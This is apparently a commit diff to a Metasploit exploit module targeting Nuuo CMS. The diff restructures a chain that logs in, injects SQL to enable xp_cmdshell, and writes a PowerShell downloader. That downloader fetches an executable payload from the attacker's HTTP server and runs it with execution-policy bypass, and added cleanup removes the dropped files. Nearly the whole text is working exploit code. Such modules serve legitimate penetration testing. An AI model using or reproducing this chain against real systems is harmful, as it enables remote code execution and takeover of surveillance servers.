@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
77 Rank = ExcellentRanking
88
99 include Msf ::Exploit ::EXE
10+ include Msf ::Exploit ::FileDropper
1011 include Msf ::Exploit ::Remote ::Nuuo
1112 include Msf ::Exploit ::Remote ::HttpServer
1213
@@ -44,7 +45,11 @@ def initialize(info={})
4445 'Privileged' => false , # we run as NETWORK_SERVICE
4546 'DisclosureDate' => 'Oct 11 2018' ,
4647 'DefaultTarget' => 0 ) )
47- register_options [ Opt ::RPORT ( 5180 ) ]
48+ register_options [
49+ Opt ::RPORT ( 5180 ) ,
50+ OptInt . new ( 'HTTPDELAY' , [ false , 'Number of seconds the web server will wait before termination' , 10 ] ) ,
51+ OptString . new ( 'URIPATH' , [ true , 'The URI to use for this exploit' , "/#{ rand_text_alpha ( 8 ..10 ) } ] )
52+ ]
4853 end
4954
5055
@@ -66,8 +71,11 @@ def on_request_uri(cli, request)
6671 print_good ( 'Sending the payload to CMS...' )
6772 send_response ( cli , @pl )
6873
74+ Rex . sleep ( 3 )
75+
6976 print_status ( 'Executing shell...' )
7077 inject_sql ( create_hex_cmd ( "xp_cmdshell \" cmd /c C:\\ windows\\ temp\\ #{ @filename } \" " ) , true )
78+ register_file_for_cleanup ( "c:/windows/temp/#{ @filename } )
7179 end
7280
7381 def create_hex_cmd ( cmd )
@@ -79,6 +87,26 @@ def create_hex_cmd(cmd)
7987 hex_cmd << "; exec (@#{ var }
8088 end
8189
90+ def primer
91+ # we need to roll our own here instead of using the MSSQL mixins
92+ # (tried that and it doesn't work)
93+ service_url = "http://#{ srvhost_addr } #{ srvport } #{ datastore [ 'URIPATH' ] }
94+ print_status ( "Enabling xp_cmdshell and asking CMS to download and execute #{ service_url } )
95+ @filename = "#{ rand_text_alpha_lower ( 8 ..10 ) }
96+ ps1 = "#{ rand_text_alpha_lower ( 8 ..10 ) }
97+ download_pl = %{xp_cmdshell }
98+ download_pl << %{'cd C:\\ windows\\ temp\\ && }
99+ download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ ps1 }
100+ download_pl << %{echo $url = "#{ service_url } #{ ps1 }
101+ download_pl << %{echo $file = "#{ @filename } #{ ps1 }
102+ download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ ps1 }
103+ download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ ps1 }
104+
105+ print_status ( 'Injecting PowerShell payload' )
106+ inject_sql ( "exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd ( download_pl ) )
107+ register_file_for_cleanup ( "c:/windows/temp/#{ ps1 } )
108+ end
109+
82110 def exploit
83111 nucs_login
84112
@@ -87,38 +115,17 @@ def exploit
87115 end
88116
89117 @pl = generate_payload_exe
90- resource_uri = "/#{ rand_text_alpha ( 8 ..16 ) }
91118
92119 #do not use SSL
93120 if datastore [ 'SSL' ]
94121 ssl_restore = true
95122 datastore [ 'SSL' ] = false
96123 end
97124
98- service_url = "http://#{ srvhost_addr } #{ srvport } #{ resource_uri }
99- print_status ( "Starting up our web service on #{ service_url } )
100- start_service ( { 'Uri' => {
101- 'Proc' => Proc . new { |cli , req |
102- on_request_uri ( cli , req )
103- } ,
104- 'Path' => resource_uri
105- } } )
106-
107- datastore [ 'SSL' ] = true if ssl_restore
108-
109- # we need to roll our own here instead of using the MSSQL mixins
110- # (tried that and it doesn't work)
111- print_status ( "Enabling xp_cmdshell and asking CMS to download and execute #{ service_url } )
112- @filename = "#{ rand_text_alpha_lower ( 8 ..10 ) }
113- download_pl = %{xp_cmdshell }
114- download_pl << %{'cd C:\\ windows\\ temp\\ && }
115- download_pl << %{echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && }
116- download_pl << %{echo $url = "#{ service_url }
117- download_pl << %{echo $file = "#{ @filename }
118- download_pl << %{echo $webclient.DownloadFile($url,$file) >> wget.ps1 && }
119- download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
120-
121- print_status ( 'Injecting PowerShell payload' )
122- inject_sql ( "exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd ( download_pl ) )
125+ begin
126+ Timeout . timeout ( datastore [ 'HTTPDELAY' ] ) { super }
127+ rescue Timeout ::Error
128+ datastore [ 'SSL' ] = true if ssl_restore
129+ end
123130 end
124131end
0 commit comments